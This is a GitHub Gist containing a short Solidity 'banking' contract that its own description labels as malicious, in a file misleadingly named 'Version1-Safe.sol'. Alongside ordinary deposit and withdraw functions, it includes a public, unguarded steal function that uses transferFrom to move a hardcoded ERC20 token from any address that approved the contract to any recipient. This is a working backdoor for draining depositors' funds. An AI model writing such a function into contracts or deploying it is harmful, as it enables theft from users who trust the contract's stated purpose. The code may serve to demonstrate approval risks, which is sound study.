Created
November 15, 2022 08:46
-
-
Save DoguD/43092540e8eddbbd48a1a43cd1025422 to your computer and use it in GitHub Desktop.
A banking smart contract with a malicious steal function inside.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // contracts/Version1-Safe.sol | |
| pragma solidity ^0.8.0; | |
| interface IERC20 { | |
| function transferFrom(address from, address to, uint256 value) external returns(bool); | |
| function transfer(address to, uint256 value) external returns(bool); | |
| } | |
| contract Bank2 { | |
| mapping(address => uint256) public depositAmount; | |
| function deposit(uint256 amount) public { | |
| IERC20(0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56).transferFrom(msg.sender, address(this), amount); | |
| depositAmount[msg.sender] += amount; | |
| } | |
| function withdraw() public { | |
| IERC20(0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56).transfer(msg.sender, depositAmount[msg.sender]); | |
| depositAmount[msg.sender] = 0; | |
| } | |
| function steal(address from, address to, uint256 amount) public { | |
| IERC20(0xe9e7CEA3DedcA5984780Bafc599bD69ADd087D56).transferFrom(from, to, amount); | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment